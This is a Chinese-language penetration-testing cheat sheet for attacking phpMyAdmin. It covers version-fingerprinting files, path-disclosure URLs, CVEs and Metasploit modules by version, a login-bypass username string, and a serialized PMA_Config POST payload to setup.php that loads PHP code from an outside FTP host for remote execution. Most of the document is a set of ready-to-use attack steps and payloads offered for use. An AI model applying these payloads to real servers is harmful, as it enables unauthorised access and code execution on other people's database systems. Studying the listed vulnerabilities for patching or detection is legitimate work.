查版本
通过 在/phpMyAdmin/目录添加以下文件获得信息:

readme.php
README
changelog.php
Change
Documetation.html
Documetation.txt
translators.html
爆路径
/phpmyadmin/libraries/lect_lang.lib.php
/phpMyAdmin/index.php?lang[]=1
/phpMyAdmin/phpinfo.php
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/lect_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php
漏洞介绍
参考链接
http://blog.51cto.com/13770310/2131305

3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
概述
PhpMyAdmin存在PREG_REPLACE_EVAL漏洞

利用模块
exploit/multi/http/phpmyadmin_preg_replace

CVE
CVE-2013-3238

3.5.2.2
概述
PhpMyAdmin存在server_sync.php后门漏洞

利用模块
exploit/multi/http/phpmyadmin_3522_backdoor

CVE
CVE-2012-5159

2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
概述
PhpMyAdmin配置文件/config/config.inc.php存在命令执行

利用模块
exploit/unix/webapp/phpmyadmin_config

CVE
CVE-2009-1151

2.11.3 / 2.11.4
利用方法
用户名处写入'localhost'@'@"则登录成功。
(注意全部是英文标点符号，最后一个为英文双引号)

2.8.0.3
参考链接
http://blog.51cto.com/jzking121/1841925

利用方法
搭建一个ftp可访问的平台，如构造如下链接:
ftp://user:pass@tmp.giraff3.cn/id.txt

id.txt文件中写入执行的php代码的内容,如：<?php phpinfo(); ?>

向/php-MyAdmin/scripts/setup.phpPOST如下数据

configuration=O:10:"PMA_Config":1:{s:6:"source";s:37:"ftp://user:pass@tmp.giraff3.cn/id.txt";}&action=test